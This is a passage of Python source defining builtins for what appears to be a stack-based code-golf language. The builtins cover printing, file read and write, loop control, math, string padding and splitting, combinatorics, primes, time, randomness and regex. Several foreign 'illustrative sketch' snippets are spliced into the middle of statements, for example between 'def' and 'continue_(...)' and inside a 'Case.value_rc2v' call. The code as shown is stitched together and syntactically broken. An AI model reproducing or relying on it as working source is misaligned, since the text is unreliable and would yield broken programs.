each\n followed by an output record separator. At the end, output an extra\n output record separator.\"\"\",\n stability=\"unstable\")\n def pd_print_lines(env: Environment) -> None:\n a = env.pop()\n if not isinstance(a, (str, list, range)):\n raise TypeError('Cannot Print_lines non-sequence')\n for e in pd_iterable(a):\n env.print_output_record(env.pd_str(e))\n env.print_output_record()\n\n @put('Printkeep', 'Ƥ', '\\x10',\n docs=\"\"\"Pop something, output to standard output followed by an\n output record separator, then push it back. Pretty much just {{\n 'Print'|b }}_{{ 'keep'|bt }}.\"\"\",\n stability=\"unstable\")\n def pd_printkeep(env: Environment) -> None:\n a = env.pop()\n env.print_output_record(env.pd_str(a))\n env.push(a)\n\n @put('Space_output', ' o',\n docs=\"Output a space.\", stability=\"beta\")\n def pd_space_output(env: Environment) -> None:\n print(' ', end=\"\")\n @put('Newline_output', '\\no', '\\\\no',\n docs=\"Output a newline.\", stability=\"beta\")\n def pd_newline_output(env: Environment) -> None:\n print()\n @put('Newline_print', '\\np', '\\\\np',\n docs=\"Output a newline, followed by an output record separator.\",\n stability=\"beta\")\n def pd_newline_print(env: Environment) -> None:\n env.print_output_record(\"\\n\")\n\n @put('Dump', 'Pdebug',\n docs=\"\"\"Print debugging information about the environment and\n stack.\"\"\",\n stability=\"alpha\")\n def dump(env: Environment) -> None:\n if env.get('Debug'):\n print('Dump:', env.debug_dump(), file=sys.stderr)\n\n if sandboxed:\n pass # TODO\n else:\n @put('Read_file', 'Vf',\n docs=\"\"\"Read contents of a file with the given name.\"\"\",\n stability=\"alpha\")\n def read_file(env: Environment) -> None:\n filename = env.pop()\n if isinstance(filename, str):\n with open(filename) as infile:\n env.push(infile.read())\n else:\n raise Exception(\"Cannot read non-string filename!\")\n @put('Output_file', 'Of',\n docs=\"\"\"Write contents to a file with the given name (overwriting the file).\"\"\",\n stability=\"alpha\")\n def output_file(env: Environment) -> None:\n a = env.pop()\n filename = env.pop()\n if isinstance(filename, str):\n with open(filename, 'w') as outfile:\n outfile.write(env.pd_str(a))\n else:\n raise Exception(\"Cannot write non-string filename!\")\n @put('Append_file', 'Af',\n docs=\"\"\"Append contents to a file with the given name.\"\"\",\n stability=\"alpha\")\n def append_file(env: Environment) -> None:\n a = env.pop()\n filename = env.pop()\n if isinstance(filename, str):\n with open(filename, 'a') as outfile:\n outfile.write(env.pd_str(a))\n else:\n raise Exception(\"Cannot append non-string filename!\")\n # }}}\n # Break, Continue, Exit {{{\n @put('Exit', 'E',\n docs=\"\"\"Exit the current program.\"\"\",\n stability=\"beta\")\n def exit(env: Environment) -> None:\n raise PdExitException(\"Exit\")\n\n @put('Exit_with_code', 'Ec',\n docs=\"\"\"Exit the current program with the specified exit code or\n message.\"\"\",\n stability=\"beta\")\n def exit_with_code(env: Environment) -> None:\n e = env.pop()\n if isinstance(e, (int, float, Char)):\n raise PdExitException(\"Exit\", num.intify(e))\n else:\n print(\"Exit: \" + str(e), file=sys.stderr)\n raise PdExitException(str(e), 1)\n\n @put('Break', 'Quit_loop', 'Q',\n docs=\"\"\"Break out of the current loop.\"\"\",\n stability=\"beta\")\n def break_(env: Environment) -> None:\n raise PdBreakException('Break')\n @put('Continue', 'Keep_going', 'K',\n docs=\"\"\"Skip to the next iteration of the current loop.\"\"\",\n stability=\"beta\")\n def 
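# Illustrative sketch (not part of the scraped file): Break/Continue
# above are implemented as plain exceptions that the interpreter's loop
# constructs catch.
class BreakDemo(Exception):
    pass

def run_loop_demo(body):
    while True:
        try:
            body()
        except BreakDemo:
            break

state = {"n": 0}
def body():
    state["n"] += 1
    if state["n"] >= 3:
        raise BreakDemo()

run_loop_demo(body)
assert state["n"] == 3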
continue_(env: Environment) -> None:\n raise PdContinueException('Continue')\n # }}}\n # Constant powers and fractions {{{\n def pd_constant_fraction_cases(p: int, q: int) -> List[Case]:\n # Cannot sensibly handle improper fractions p/q > 1 if q > 1.\n return [\n Case.number(lambda env, a: [num.pd_mul_div_const(a, p, q)]),\n Case.seq(lambda env, a: [pd_slice(a, None, len(a)*p//q) if p <= q else pd_mul_seq(a, p)]),\n Case.block(lambda env, b:\n pd_run_with_probability_then_empty_list(env, b, p/q)\n if p <= q else\n pd_foreach_x_only_then_empty_list(env, b, range(p))\n ),\n ]\n cput('Halve', ['½'], pd_constant_fraction_cases(1, 2), stability=\"alpha\")\n cput('Quarter', ['¼'], pd_constant_fraction_cases(1, 4), stability=\"alpha\")\n cput('Three_quarters', ['¾'], pd_constant_fraction_cases(3, 4), stability=\"alpha\")\n cput('Double', ['×'], pd_constant_fraction_cases(2, 1), stability=\"beta\")\n\n cput('Halve_int', ['Hi'], [\n Case.number(lambda env, a: [num.pd_mul_div_const(a, 1, 2, to_int=True)]),\n ], stability=\"unstable\")\n\n cput('Square', ['²'], [\n Case.number(lambda env, n: [num.pd_power_const(n, 2)]),\n Case.seq(lambda env, s: [pd_cartesian_product_seq_matrix(s, s)]),\n Case.block_seq_range(lambda env, block, seq: [pd_map_cartesian_product(env, block, seq, seq, flat=False)]),\n ],\n docs=\"\"\"Square a number, or compute the Cartesian product of a\n sequence with itself, or map a block across that.\"\"\",\n stability=\"beta\")\n cput('Cube', ['³'], [\n Case.number(lambda env, n: [num.pd_power_const(n, 3)]),\n Case.seq(lambda env, s: [pd_cartesian_product_seq_matrix_3(s, s, s)]),\n ],\n docs=\"\"\"Cube a number, or compute the Cartesian product of three\n copies of a sequence.\"\"\",\n stability=\"beta\")\n # }}}\n # Len, abs, loop {{{\n abs_case = Case.number(lambda env, n: [num.pd_abs(n)])\n len_case = Case.seq(lambda env, seq: [len(seq)])\n loop_case = Case.block(lambda env, block: [pd_forever_then_empty_list(env, block)])\n cput('Len', [], [len_case],\n docs=\"\"\"Length of a sequence.\"\"\",\n stability=\"stable\",\n golf_aliases=['L'])\n cput('Abs', [], [abs_case],\n docs=\"\"\"Absolute value of a number.\"\"\",\n stability=\"stable\",\n golf_aliases=['L'])\n cput('Loop', [], [loop_case],\n docs=\"\"\"Loop forever (until {{ 'Break'|b }} or other error.)\"\"\",\n stability=\"alpha\",\n golf_aliases=['L'])\n cput('Abs_or_len_or_loop', ['L'], [abs_case, len_case, loop_case],\n docs=\"\"\"{{ 'Abs'|b }} on numbers; {{ 'Len'|b }} on sequences; {{\n 'Loop'|b }} on blocks.\"\"\",\n stability=\"alpha\")\n # }}}\n # Other numeric predicates {{{\n cput('Positive', ['+p'], [Case.value_n2v(lambda e: int(e.real > 0))], stability=\"beta\")\n cput('Negative', ['-p'], [Case.value_n2v(lambda e: int(e.real < 0))], stability=\"beta\")\n cput('Positive_or_zero', ['+o'], [Case.value_n2v(lambda e: int(e.real >= 0))], stability=\"alpha\")\n cput('Negative_or_zero', ['-o'], [Case.value_n2v(lambda e: int(e.real <= 0))], stability=\"alpha\")\n # }}}\n # Dumping Python's math {{{\n cput('Sin', ['Sn'], [Case.value_rc2v(math.sin , cmath.sin )], stability=\"beta\")\n cput('Cos', ['Cs'], [Case.value_rc2v(math.cos , cmath.cos )], stability=\"beta\")\n cput('Tan', ['Tn'], [Case.value_rc2v(math.tan , cmath.tan )], stability=\"beta\")\n cput('Asin', ['As'], [Case.value_rc2v(math.asin, cmath.asin)], stability=\"beta\")\n cput('Acos', ['Ac'], [Case.value_rc2v(math.acos, cmath.acos)], stability=\"beta\")\n cput('Atan', ['At'], [Case.value_rc2v(math.atan, cmath.atan)], stability=\"beta\")\n cput('Sec', ['Sc'], 
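# Illustrative sketch (not part of the scraped file): the constant-
# fraction builtins above scale a number by p/q and keep the first p/q
# of a sequence (shown here for the p <= q case only).
def halve_demo(x):
    if isinstance(x, (int, float)):
        return x / 2
    return x[:len(x) // 2]

assert halve_demo(7) == 3.5
assert halve_demo("abcdef") == "abc"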
[Case.value_rc2v(lambda t: 1/math.cos(t), lambda t: 1/cmath.cos(t))], stability=\"alpha\")\n cput('Csc', ['Cc'], [Case.value_rc2v(lambda t: 1/math.sin(t), lambda t: 1/cmath.sin(t))], stability=\"alpha\")\n cput('Cot', ['Ct'], [Case.value_rc2v(lambda t: 1/math.tan(t), lambda t: 1/cmath.tan(t))], stability=\"alpha\")\n cput('Exp', ['Ef'], [Case.value_rc2v(math.exp , cmath.exp )], stability=\"beta\", docs=\"Exponential Function\")\n cput('Log_e', ['Ln'], [Case.value_rc2v(math.log , cmath.log )], stability=\"beta\")\n cput('Log_ten', ['Lt'], [Case.value_rc2v(math.log10, cmath.log10)], stability=\"alpha\")\n cput('Log_two', ['Lg'], [Case.value_rc2v(math.log2 , lambda t: cmath.log(t) / cmath.log(2))], stability=\"alpha\")\n # }}}\n # Character conversion and predicates (letter-case etc) {{{\n cput('Lowercase', ['Lc'], [Case.value(lambda env, x: [pd_deepmap_s2s(lambda e: e.lower(), x)])], docs=\"Converts all characters to lowercase. Deeply vectorizes.\", stability=\"beta\")\n cput('Uppercase', ['Uc'], [Case.value(lambda env, x: [pd_deepmap_s2s(lambda e: e.upper(), x)])], docs=\"Converts all characters to uppercase. Deeply vectorizes.\", stability=\"beta\")\n cput('Exchange_case', ['Xc'], [Case.value(lambda env, x: [pd_deepmap_s2s(lambda e: e.swapcase(), x)])], docs=\"Swaps the case of all characters. Deeply vectorizes.\", stability=\"alpha\")\n # TODO: this doesn't work on, say, lists of chars\n cput('Title_case', ['Tc'], [Case.value(lambda env, x: [pd_deepmap_s2s(lambda e: e.title(), x)])], docs=\"Title-cases all strings?\", stability=\"alpha\")\n cput('Matching_character', ['Mc'], [\n Case.value(lambda env, x: [pd_deepmap_s2s(\n lambda e: num.matching_dict.get(e, e), x, whole_str_ok=False)])\n ],\n docs=\"\"\"Finds the matching character for one of the characters\n ()[]{}<>, or returns the character itself. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n\n cput('Is_alpha', ['Ap'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.isalpha()), x)])], docs=\"Tests if characters are letters. Deeply vectorizes.\", stability=\"beta\")\n cput('Is_digit', ['Dp'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.isdigit()), x)])], docs=\"Tests if characters are digits. Deeply vectorizes.\", stability=\"alpha\")\n cput('Is_lower', ['Lp'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.islower()), x)])], docs=\"Tests if characters are lowercase. Deeply vectorizes.\", stability=\"beta\")\n cput('Is_upper', ['Up'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.isupper()), x)])], docs=\"Tests if characters are uppercase. Deeply vectorizes.\", stability=\"beta\")\n cput('Is_space', ['Wp'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.isspace()), x)])], docs=\"Tests if characters are whitespace. Deeply vectorizes.\", stability=\"alpha\")\n cput('Value_of_character', ['Vc'], [\n Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: num.value_dict.get(e, 0), x)])\n ],\n docs=\"\"\"Finds the \"value\" of a character: digits give their numeric\n value, - and < give -1, + and > give +1, everything else gives 0.\n Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Nest_of_character', ['Nc'], [\n Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: num.nest_dict.get(e, 0), x)])\n ],\n docs=\"\"\"Finds the amount by which a character affects \"nestedness\":\n ([{< give +1, >}]) give -1, everything else gives 0. 
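# Illustrative sketch (not part of the scraped file): the "deeply
# vectorizes" character maps above recurse through nested lists and
# apply a per-character function to each string.
def deepmap_s2s_demo(f, x):
    if isinstance(x, list):
        return [deepmap_s2s_demo(f, e) for e in x]
    return "".join(f(c) for c in x)

assert deepmap_s2s_demo(str.upper, ["ab", ["cd"]]) == ["AB", ["CD"]]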
Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Int_of_alpha', ['Ia'], [Case.value(lambda env, x: [pd_deepmap_s2v(num.int_of_alpha, x)])],\n docs=\"\"\"Convert a letter to an integer starting with A = 1;\n non-letters (or letters outside the Latin alphabet) give 0. Deeply\n vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Lower_of_int', ['Li'], [Case.value(lambda env, x: [pd_deepmap_n2v(lambda e: num.lower_of_int(num.intify(e)), x)])],\n docs=\"\"\"Convert an integer to a lowercase letter starting with a =\n 1; things outside the range 1 to 26 give spaces. Deeply\n vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Upper_of_int', ['Ui'], [Case.value(lambda env, x: [pd_deepmap_n2v(lambda e: num.upper_of_int(num.intify(e)), x)])],\n docs=\"\"\"Convert an integer to an uppercase letter starting with A =\n 1; things outside the range 1 to 26 give spaces. Deeply\n vectorizes.\"\"\",\n stability=\"unstable\")\n # }}}\n # Replicate, fill/pad {{{\n\n cput('Replicate', ['°', 'Rp'], [\n Case.any_number(lambda env, x, n: [pd_replicate(x, num.intify(n))]),\n ],\n docs=\"\"\"Make a list by repeating an element some number of\n times.\"\"\",\n stability=\"beta\")\n\n cput('Signed_replicate', ['Sr'], [\n Case.any_any_number(lambda env, x, y, n: [\n pd_replicate(y, num.intify(n))\n if num.intify(n) >= 0 else\n pd_replicate(x, -num.intify(n))\n ]),\n ],\n docs=\"\"\"Make a list by repeating one of two elements some number of\n times, the first one if negative and the second one if\n positive.\"\"\",\n stability=\"unstable\")\n\n # Left-padding is right-justifying and vice versa...\n\n def char_biased_pad_cases(\n f: Callable[[str, int], str]) -> List[Case]:\n return [\n Case.char_number(lambda env, c, n: [f(env.pd_str(c), num.intify(n))]),\n Case.value_number(lambda env, c, n: [f(env.pd_str(c), num.intify(n))]),\n ]\n\n cput('Zero_fill', ['Zf'],\n char_biased_pad_cases(lambda s, n: s.rjust(n, '0')),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and left-pad it with zeroes until at least the\n length.\"\"\",\n stability=\"unstable\")\n cput('Left_fill_with_spaces', ['f'],\n char_biased_pad_cases(lambda s, n: s.ljust(n)),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and right-pad it with spaces until at least the\n length.\"\"\",\n stability=\"unstable\")\n cput('Center_fill_with_spaces', ['=f'],\n char_biased_pad_cases(lambda s, n: s.center(n)),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and pad it with equally many spaces on either side\n until at least the length.\"\"\",\n stability=\"unstable\")\n cput('Left_add_spaces', ['‹p'],\n char_biased_pad_cases(lambda s, n: ' ' * n + s),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and prepend that many spaces. Mnemonic: well, left-pad\n (but \"fill\" doesn't make sense unless you're filling up to\n something, whereas padding still makes sense.)\"\"\",\n stability=\"unstable\")\n cput('Right_add_spaces', ['›p'],\n char_biased_pad_cases(lambda s, n: s + ' ' * n),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and append that many spaces. 
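# Illustrative sketch (not part of the scraped file): the string-padding
# builtins above map directly onto Python's str justification methods.
assert "42".rjust(5, "0") == "00042"  # Zero_fill
assert "42".ljust(5) == "42   "       # Left_fill_with_spaces
assert "42".center(6) == "  42  "     # Center_fill_with_spaces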
Mnemonic: well, right-pad\n (but \"fill\" doesn't make sense unless you're filling up to\n something, whereas padding still makes sense.)\"\"\",\n stability=\"unstable\")\n\n cput('Left_fill', ['[f'], [\n Case.list_range_number_any(lambda env, s, n, fill:\n [pd_build_like(s, [fill] * (num.intify(n) - len(s)) + list(pd_iterable(s)))]),\n ],\n docs=\"\"\"Given a list (numbers coerce to ranges), a length, and a\n filler object, left-pad the list with the filler object until at\n least the length.\"\"\",\n stability=\"unstable\")\n cput('Right_fill', [']f'], [\n Case.list_range_number_any(lambda env, s, n, fill:\n [pd_build_like(s, list(pd_iterable(s)) + [fill] * (num.intify(n) - len(s)))]),\n ],\n docs=\"\"\"Given a list (numbers coerce to ranges), a length, and a\n filler object, right-pad the list with the filler object until at\n least the length.\"\"\",\n stability=\"unstable\")\n cput('Left_add', ['«p'], [\n Case.list_range_number_any(lambda env, s, n, fill:\n [pd_build_like(s, [fill] * (num.intify(n)) + list(pd_iterable(s)))]),\n ],\n docs=\"\"\"Given a list (numbers coerce to ranges), a number, and a\n filler object, left-pad the list with number copies of the filler\n object.\"\"\",\n stability=\"unstable\")\n cput('Right_add', ['»p'], [\n Case.list_range_number_any(lambda env, s, n, fill:\n [pd_build_like(s, list(pd_iterable(s)) + [fill] * (num.intify(n)))]),\n ],\n docs=\"\"\"Given a list (numbers coerce to ranges), a number, and a\n filler object, right-pad the list with number copies of the filler\n object.\"\"\",\n stability=\"unstable\")\n\n cput('Space_repeat', [' x'], [\n Case.int_len(lambda env, n: [' ' * n]),\n ],\n stability=\"alpha\")\n\n cput('Newline_repeat', ['\\nx', '\\\\nx'], [\n Case.int_len(lambda env, n: ['\\n' * n]),\n ],\n stability=\"alpha\")\n # }}}\n # Key_* functions, for big arrays {{{\n cput('Key_new', ['Kn'], [\n Case.list_list_singleton_value(lambda env, kvs, dims, filler: [pd_new_array(kvs, dims, filler)]),\n ],\n docs=\"\"\"Make an array given a starting list of key-value pairs,\n dimensions, and filler.\"\"\",\n stability=\"alpha\")\n cput('Key_map', ['Km'], [\n Case.list_list_block(lambda env, arr, ks, func: [pd_array_keys_map(env, arr, ks, func)]),\n ],\n docs=\"\"\"Map over keys of an array.\"\"\",\n stability=\"alpha\")\n cput('Key_get', ['Kg'], [\n Case.seq_seq_singleton(lambda env, arr, k: [pd_array_key_get(arr, k)]),\n ],\n docs=\"\"\"Access value corresponding to a key in an array.\"\"\",\n stability=\"alpha\")\n # }}}\n # W for Window and W for Words, plus splitting {{{\n words_case = Case.seq(lambda env, seq: [pd_split_seq_by_spaces(seq)])\n window_case = Case.number_seq(lambda env, n, seq: [pd_sliding_window_seq(seq, n)])\n while_case = Case.block2(lambda env, cond, body:\n pd_while_then_empty_list(env, cond, body))\n cput('Words', [], [words_case], stability=\"alpha\", golf_aliases=['W'])\n cput('Window', [], [window_case], stability=\"alpha\", golf_aliases=['W'])\n\n space_split_case = Case.seq(lambda env, seq: [pd_split_seq_by(seq, ' ')])\n cput('Space_split', ['Space_break', ' b', ' s'], [space_split_case],\n docs=\"\"\"Split by a single space. Note that this returns empty\n strings between adjacent spaces, as well as at the start or end if\n the string starts or ends with spaces, and it does not split by\n other whitespace. 
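# Illustrative sketch (not part of the scraped file): Left_fill above
# pads a list on the left with a filler value up to a minimum length.
def left_fill_demo(seq, n, fill):
    return [fill] * (n - len(seq)) + list(seq)

assert left_fill_demo([1, 2], 4, 0) == [0, 0, 1, 2]
assert left_fill_demo([1, 2, 3], 2, 0) == [1, 2, 3]  # already long enough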
Use {{ 'Words'|b }} if you don't want that.\n\n I think I had a reason at one point, but I don't remember why I\n passed up \"s for split\" for \"b for break\" as the mnemonic, and\n re-examining this idea now there are quite a few reasons for s.\"\"\",\n stability=\"alpha\")\n\n lines_case = Case.seq(lambda env, seq: [pd_split_seq_by(seq, '\\n')])\n cput('Line_split', ['Lines', 'Line_break', '\\nb', '\\\\nb', '\\ns', '\\\\ns'], [lines_case],\n docs=\"\"\"Split by a single newline.\"\"\",\n stability=\"alpha\")\n\n comma_split_case = Case.seq(lambda env, seq: [pd_split_seq_by(seq, ',')])\n cput('Comma_split', [',s'], [comma_split_case],\n docs=\"\"\"Split by a single comma.\"\"\",\n stability=\"alpha\")\n\n def map_on_case(delim: str) -> Case:\n return Case.block_value(lambda env, block, value:\n [delim.join(env.pd_str(w) for w in pd_map_iterable(env, block, env.pd_str(value).split(delim)))])\n cput('Map_on_words', [' m'], [map_on_case(' ')],\n docs=\"\"\"Map on words: takes a block and a string, split the string\n by spaces, map the block over the tokens, then join the tokens with\n a space.\"\"\",\n stability=\"alpha\")\n cput('Map_on_lines', ['\\nm', '\\\\nm'], [map_on_case('\\n')],\n docs=\"\"\"Map on lines: takes a block and a string, split the string\n into lines, map the block over the tokens, then join the tokens\n with a linebreak.\"\"\",\n stability=\"alpha\")\n\n cput('While', [], [while_case],\n docs=\"\"\"While loop: Execute first block, pop, break if false, execute\n second block, repeat.\"\"\",\n stability=\"alpha\", golf_aliases=['W'])\n cput('Window_or_words_or_while', ['W'], [words_case, window_case, while_case],\n docs=\"\"\"Words (split by spaces) or Window (sliding window of size\n given by number) or While loop.\"\"\",\n stability=\"alpha\")\n # }}}\n # Combinatorics {{{\n factorial_case = Case.number(\n lambda env, n: [discrete.factorial(num.realify(n))]\n )\n permutation_cases = [\n Case.seq(lambda env, seq:\n [list(list(p) for p in itertools.permutations(pd_iterable(seq)))]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_map_iterable(env, block,\n map(list, itertools.permutations(pd_iterable(seq))))]),\n ]\n cput('Permutations', [], permutation_cases, stability=\"beta\", golf_aliases=['¡'])\n cput('Factorial', [], [factorial_case], stability=\"beta\", golf_aliases=['¡'])\n cput('Permutations_or_factorial', ['¡', '!p'],\n [factorial_case] + permutation_cases,\n stability=\"beta\")\n binomial_coefficient_case = (\n Case.number2(lambda env, n, k: [discrete.binomial_coefficient(\n num.realify(n), num.realify(k))])\n )\n cput('Binomial_coefficient', ['Bc'], [binomial_coefficient_case],\n stability=\"beta\", golf_aliases=['Ç'])\n cput('Ç', [], [binomial_coefficient_case],\n docs=\"Unstable alias for {{ 'Binomial_coefficient'|b }}.\",\n stability=\"unstable\")\n # TODO: choose\n cput('Subsequences', ['¿', 'Ss'], [\n Case.number(lambda env, n: [2 ** num.numerify(n)]),\n Case.seq(lambda env, seq: [pd_subsequences_list(seq)]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_map_iterable(env, block,\n pd_subsequences(seq))]),\n ],\n stability=\"beta\")\n cput('Fibonacci', ['Fb'], [Case.number(\n lambda env, n: [discrete.fibonacci(num.realify(n))]\n )],\n stability=\"beta\")\n # }}}\n # adjacencies {{{\n cput('Orthogonal_neighbors', ['+n'], [\n Case.value(lambda env, x: [pd_orthogonal_neighbors(x)]),\n ],\n docs=\"\"\"Return a list of almost-copies of the object, two per deep\n element, one with that deep element decreased by 1 and one with it\n increased by 
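# Illustrative sketch (not part of the scraped file): Subsequences above
# yields 2**n results for a length-n input, one per subset of indices.
from itertools import combinations

def subsequences_demo(seq):
    return [list(c) for r in range(len(seq) + 1) for c in combinations(seq, r)]

assert len(subsequences_demo([1, 2, 3])) == 2 ** 3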
1.\"\"\",\n stability=\"unstable\")\n\n cput('King_neighbors', ['*n'], [\n Case.value(lambda env, x: [pd_king_neighbors(x)]),\n ],\n docs=\"\"\"Return a list of almost-copies of the object, every variant\n obtainable by modifying each deep element by -1, 0, or 1, except\n for the original object itself.\"\"\",\n stability=\"unstable\")\n # }}}\n # Number theory (primes etc) {{{\n cput('Is_prime', ['Pp', '¶'], [\n Case.value_r2v(discrete.is_prime_as_int),\n ],\n docs=\"\"\"Test if this is prime.\"\"\",\n stability=\"alpha\")\n cput('Prev_prime', ['(p'], [\n Case.value_r2v(discrete.prev_prime),\n ],\n docs=\"\"\"Find the largest prime smaller than this.\"\"\",\n stability=\"alpha\")\n cput('Next_prime', [')p'], [\n Case.value_r2v(discrete.next_prime),\n ],\n docs=\"\"\"Find the smallest prime larger than this.\"\"\",\n stability=\"alpha\")\n cput('Factorize', ['Fc'], [\n Case.value_r2v(discrete.prime_factorization_wrapped),\n ],\n docs=\"\"\"Factorize as a list of pairs of primes and exponents\"\"\",\n stability=\"alpha\")\n cput('Factorize_flat', ['Ff'], [\n Case.value_r2v(discrete.prime_factorization_flat),\n ],\n docs=\"\"\"Factorize as a flat list of possibly repeating prime\n factors\"\"\",\n stability=\"alpha\")\n cput('Totient', ['Et'], [\n Case.value_r2v(discrete.totient),\n ],\n docs=\"Euler's Totient function. If you don't need vectorizing, {{ 'Ø'|b }} works too.\", stability=\"alpha\")\n cput('Jacobi_symbol', ['Js'], [\n Case.number2(lambda env, m, n: [discrete.jacobi_symbol(num.realify(m), num.realify(n))]),\n ],\n docs=\"\"\"Jacobi symbol of two numbers\"\"\",\n stability=\"unstable\")\n # }}}\n # Time {{{\n cput('Now_time', ['Nt'], [Case.void(lambda env: [time.time()])], stability=\"alpha\")\n now = datetime.datetime.now\n fts = datetime.datetime.fromtimestamp\n\n cput('Now_minute', ['Nb'], [Case.void (lambda _: [ now().minute ])], docs=\"Get the current minute\", stability=\"alpha\")\n cput('Epoch_minute', ['Eb'], [Case.value_r2v(lambda e: fts(e).minute )], docs=\"Get the minute from a timestamp\", stability=\"alpha\")\n cput('Now_day', ['Nd'], [Case.void (lambda _: [ now().day ])], docs=\"Get the current day\", stability=\"alpha\")\n cput('Epoch_day', ['Ed'], [Case.value_r2v(lambda e: fts(e).day )], docs=\"Get the day from a timestamp\", stability=\"alpha\")\n cput('Now_hour', ['Nh'], [Case.void (lambda _: [ now().hour ])], docs=\"Get the current hour\", stability=\"alpha\")\n cput('Epoch_hour', ['Eh'], [Case.value_r2v(lambda e: fts(e).hour )], docs=\"Get the hour from a timestamp\", stability=\"alpha\")\n cput('Now_twelve_hour', ['Ni'], [Case.void (lambda _: [(now().hour - 1) % 12 + 1 ])], docs=\"Get the current hour, as a number from 1 to 12\", stability=\"alpha\")\n cput('Epoch_twelve_hour', ['Ei'], [Case.value_r2v(lambda e: (fts(e).hour - 1) % 12 + 1 )], docs=\"Get the hour, as a number from 1 to 12 from a timestamp\", stability=\"alpha\")\n cput('Now_day_of_year', ['Nj'], [Case.void (lambda _: [ now().timetuple().tm_yday])], docs=\"Get the current day of year\", stability=\"alpha\") # type: ignore\n cput('Epoch_day_of_year', ['Ej'], [Case.value_r2v(lambda e: fts(e).timetuple().tm_yday )], docs=\"Get the day of year from a timestamp\", stability=\"alpha\") # type: ignore\n cput('Now_month', ['Nm'], [Case.void (lambda _: [ now().month ])], docs=\"Get the current month\", stability=\"alpha\")\n cput('Epoch_month', ['Em'], [Case.value_r2v(lambda e: fts(e).month )], docs=\"Get the month from a timestamp\", stability=\"alpha\")\n cput('Now_second', ['Ns'], [Case.void (lambda 
_: [ now().second ])], docs=\"Get the current second\", stability=\"alpha\")\n cput('Epoch_second', ['Es'], [Case.value_r2v(lambda e: fts(e).second )], docs=\"Get the second from a timestamp\", stability=\"alpha\")\n cput('Now_iso_weekday', ['Nu'], [Case.void (lambda _: [ now().isoweekday() ])], docs=\"Get the current ISO weekday (Monday is 1, Sunday is 7)\", stability=\"alpha\")\n cput('Epoch_iso_weekday', ['Eu'], [Case.value_r2v(lambda e: fts(e).isoweekday() )], docs=\"Get the ISO weekday (Monday is 1, Sunday is 7) from a timestamp\", stability=\"alpha\")\n cput('Now_weekday', ['Nw'], [Case.void (lambda _: [ now().weekday() ])], docs=\"Get the current weekday (Monday is 0, Sunday is 6)\", stability=\"alpha\")\n cput('Epoch_weekday', ['Ew'], [Case.value_r2v(lambda e: fts(e).weekday() )], docs=\"Get the weekday (Monday is 0, Sunday is 6) from a timestamp\", stability=\"alpha\")\n cput('Now_year', ['Ny'], [Case.void (lambda _: [ now().year ])], docs=\"Get the current year\", stability=\"alpha\")\n cput('Epoch_year', ['Ey'], [Case.value_r2v(lambda e: fts(e).year )], docs=\"Get the year from a timestamp\", stability=\"alpha\")\n # }}}\n # Randomness {{{\n cput('Random_float', ['Rf'], [Case.void(lambda env: [random.random()])],\n stability=\"alpha\")\n cput('Random_gaussian', ['Rg'], [\n Case.void(lambda env: [random.gauss(0, 1)])\n ],\n stability=\"alpha\")\n cput('Random_int', ['Ri'], [\n Case.number(lambda env, n: [random.randrange(num.intify(n))])\n ],\n stability=\"alpha\")\n cput('Random_choice', ['Rc'], [\n Case.seq(lambda env, seq: [random.choice(pd_deref(seq))])\n ],\n stability=\"alpha\")\n @put('Random_seed', stability=\"alpha\")\n def random_seed(env: Environment) -> None:\n e = env.pop()\n if isinstance(e, (Char, int, float)):\n random.seed(num.intify(e))\n elif isinstance(e, str):\n random.seed(e)\n else:\n raise AssertionError(\"Can't seed random with non-numeric non-string value \" + repr(e))\n # }}}\n # Regular expressions {{{\n cput('Regex_search', ['Xs'], [\n Case.value2(lambda env, s, regex: [match_to_pd(re.search(env.pd_str(regex), env.pd_str(s)))]),\n ],\n docs=\"\"\"Take a string and a regex, and perform a regex search\n through the string. Returns a list consisting of the string matched\n by the regex followed by all of the regex's groups, or an empty\n list if no match is found (so the truthiness of the result is\n whether a match is found).\"\"\",\n stability=\"unstable\")\n cput('Regex_match', ['Xm'], [\n Case.value2(lambda env, s, regex: [match_to_pd(re.fullmatch(env.pd_str(regex), env.pd_str(s)))]),\n ],\n docs=\"\"\"Take a string and a regex, and attempt to match the regex\n exactly against the entire string. Returns a list consisting of\n the string matched by the regex followed by all of the regex's\n groups, or an empty list if no match is found (so the truthiness of\n the result is whether a match is found).\"\"\",\n stability=\"unstable\")\n cput('Regex_array', ['Xa'], [\n Case.value2(lambda env, s, regex: [[match_to_pd(m) for m in re.finditer(env.pd_str(regex), env.pd_str(s))]]),\n ],\n docs=\"\"\"Take a string and a regex, and find all matches (this is\n Python's re.finditer, and its caveats apply.) 
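# Illustrative sketch (not part of the scraped file): the regex result
# convention above, where a match becomes [whole match, *groups] and a
# failed match becomes an empty (hence falsy) list.
import re

def match_to_pd_demo(m):
    return [] if m is None else [m.group(0), *m.groups()]

assert match_to_pd_demo(re.search(r"(\d+)-(\d+)", "a 12-34 b")) == ["12-34", "12", "34"]
assert match_to_pd_demo(re.search(r"x", "abc")) == []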
